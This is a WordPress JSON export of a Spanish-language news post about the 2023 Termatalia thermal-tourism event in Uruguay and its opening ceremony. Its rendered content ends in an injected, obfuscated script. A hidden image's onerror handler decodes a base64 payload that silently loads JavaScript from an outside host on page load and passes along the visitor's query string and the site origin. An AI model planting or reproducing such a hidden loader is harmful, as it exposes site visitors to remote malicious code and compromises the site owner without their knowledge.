{"id":7415,"date":"2023-10-04T15:28:59","date_gmt":"2023-10-04T18:28:59","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7415"},"modified":"2025-08-13T15:52:49","modified_gmt":"2025-08-13T18:52:49","slug":"uruguay-confia-en-termatalia-para-posicionarse-como-destino-termal-destacado-en-america","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7415","title":{"rendered":"Uruguay conf\u00eda en Termatalia para posicionarse como destino termal destacado en Am\u00e9rica"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><strong><em>El presidente de la Rep\u00fablica Oriental del Uruguay, Luis Lacalle Pou, asisti\u00f3 al acto de apertura de este evento siendo la primera vez que un Jefe de Estado participa en este evento con sello ourensano<\/em><\/strong><\/h5>\n\n\n\n<p><strong>El 21\u00ba Encuentro Internacional sobre Agua y Termalismo, que se celebra entre el 4 y 6 de octubre en Salto y Paysand\u00fa, re\u00fane a ponentes, touroperadores y prensa especializada de una veintena de pa\u00edses<\/strong><\/p>\n\n\n\n<p>en Termatalia para promocionar a nivel internacional sus recursos termales y posicionarse, por cantidad y calidad, como uno de los grandes destinos termales de Am\u00e9rica. Como firme muestra de esta apuesta por el turismo termal, el propio presidente de la Rep\u00fablica Oriental del Uruguay, Luis Lacalle Pou, participaba esta ma\u00f1ana en el acto oficial de inauguraci\u00f3n de Termatalia Uruguay, 21\u00ba Encuentro Internacional sobre Turismo de Termal, Salud y Bienestar que se celebra hasta el viernes d\u00eda 6 en Salto y Paysand\u00fa, las dos intendencias que configuran el \u201cDestino Termas\u201d. Se trata de la 21\u00aa edici\u00f3n de Termatalia y de la quinta en Am\u00e9rica, pero esta ha sido la primera vez en la que un Jefe de Estado ha participado en el acto oficial de apertura.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-1024x683.jpg\" alt=\"\" class=\"wp-image-7423\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-2048x1365.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254886-1-800x533.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>Acompa\u00f1aron al presidente Lacalle representantes de las principales entidades vinculadas con el turismo en este pa\u00eds, desde el propio Ministro de Turismo, Tabar\u00e9 Viera y todo su equipo, hasta representantes de la CTM Salto Grande, de ANTEL (compa\u00f1\u00eda telef\u00f3nica), de Aeropuertos de Uruguay, del Embajador de Espa\u00f1a de Uruguay o de la C\u00f3nsul General Espa\u00f1ola en este pa\u00eds.<\/p>\n\n\n\n<p>Participaron adem\u00e1s en el acto de apertura, dirigido por el director de Termatalia, Rogelio Mart\u00ednez, los dos intendentes anfitriones del evento, el de Salto (Andr\u00e9s Lima), y el de Paysand\u00fa (Nicol\u00e1s Olivera). La representaci\u00f3n gallega corri\u00f3 a cargo de la Jefa del \u00c1rea de Termalismo de la Xunta de Galicia (Bel\u00e9n G\u00f3mez Quevedo) que estuvo arropada por la delegada de la Xunta en Uruguay, Elvira Dom\u00ednguez, y por el de la vecina Argentina, Alejandro L\u00f3pez Dobarro. El acto de apertura incluy\u00f3 adem\u00e1s un saludo del presidente de la European Spas Association, Thierry Dubois. Esta entidad representa a las asociaciones balnearias de 25 pa\u00edses europeos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-1024x683.jpg\" alt=\"\" class=\"wp-image-7420\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254894.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>Termatalia Uruguay fue tambi\u00e9n el escenario del anuncio en primicia, por parte del propio presidente de la Rep\u00fablica, de que Uruguay ser\u00e1 una de las sedes oficiales del Mundial de Futbol de 2030.<\/p>\n\n\n\n<p>Volviendo al acto inaugural, el director de Termatalia destac\u00f3 la firmeza de la decisi\u00f3n del Ministerio de Turismo de Uruguay por querer acoger este evento y celebrarlo en Salto y Paysand\u00fa (ubicadas a alrededor de 500 kil\u00f3metros de Montevideo, su capital), ya que aqu\u00ed es donde se ubican las instalaciones termales que quieren promocionar. <strong>\u201c<\/strong>Esperamos que este evento obtenga los mismos \u00e9xitos que las ediciones anteriores celebradas en Per\u00fa, Argentina, M\u00e9xico y Brasil y cuyos organizadores han dicho que la celebraci\u00f3n de Termatalia en su pa\u00eds supuso un antes y un despu\u00e9s en el desarrollo y promoci\u00f3n de sus recursos termales. Deseamos que as\u00ed sea tambi\u00e9n en Uruguay y que podamos comprobarlo a corto plazo\u201d, indic\u00f3 Rogelio Mart\u00ednez.<\/p>\n\n\n\n<p>Rogelio Mart\u00ednez ahizo referencia tambi\u00e9n al hecho de que \u201cUruguay lo tiene todo para convertirse en un destino termal de referencia, tiene aguas minerales en calidad y cantidad, tiene infraestructuras, tiene usuarios nacionales e internacionales y, sobre todo, tiene muchas ganas. Termatalia Uruguay llega para completar ese inter\u00e9s con capacitaci\u00f3n profesional especializada en hidrolog\u00eda m\u00e9dica, en marketing, en farmacolog\u00eda, en investigaci\u00f3n, en compartir casos de \u00e9xito de entidades p\u00fablicas y privadas\u2026 Y por este motivo estamos hoy aqu\u00ed todos contribuyendo a promocionar internacionalmente al Destino Termas de Uruguay y convirtiendo a este pa\u00eds en el epicentro del termalismo mundial\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2.jpg\"><img decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"7425\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-1024x682.jpg\" alt=\"\" class=\"wp-image-7425\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-1024x682.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-768x511.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-696x463.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-1068x711.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-631x420.jpg 631w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254892-2.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254893-1.jpg\"><img decoding=\"async\" data-id=\"7426\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/1000254893-1-1024x682.jpg\" alt=\"\" class=\"wp-image-7426\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Al concluir el acto de apertura, Expourense, la entidad que organiza Termatalia, regal\u00f3 al presidente Lacalle una pintura con tem\u00e1tica termal realizada en exclusiva para la ocasi\u00f3n por el artista ourensano Juan Valc\u00e1rcel.<\/p>\n\n\n\n<p>Con este acto inaugural arrancaba la primera jornada del 21\u00ba Encuentro Internacional sobre Agua y Termalismo, Evento declarado de Inter\u00e9s Tur\u00edstico por el Ministerio de Turismo de Uruguay, y que re\u00fane a profesionales de una veintena de pa\u00edses (Alemania, Argentina, Brasil, Chile, Colombia, Costa Rica, Croacia, Ecuador, Estados Unidos, Espa\u00f1a, Francia, Guatemala, Hungr\u00eda M\u00e9xico, Panam\u00e1, Per\u00fa, Portugal y Uruguay).<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El presidente de la Rep\u00fablica Oriental del Uruguay, Luis Lacalle Pou, asisti\u00f3 al acto de apertura de este evento siendo la primera vez que un Jefe de Estado participa en este evento con sello ourensano El 21\u00ba Encuentro Internacional sobre Agua y Termalismo, que se celebra entre el 4 y 6 de octubre en Salto [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7417,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-7415","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7415","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7415"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7415\/revisions"}],"predecessor-version":[{"id":10295,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7415\/revisions\/10295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7417"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7415"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7415"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7415"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}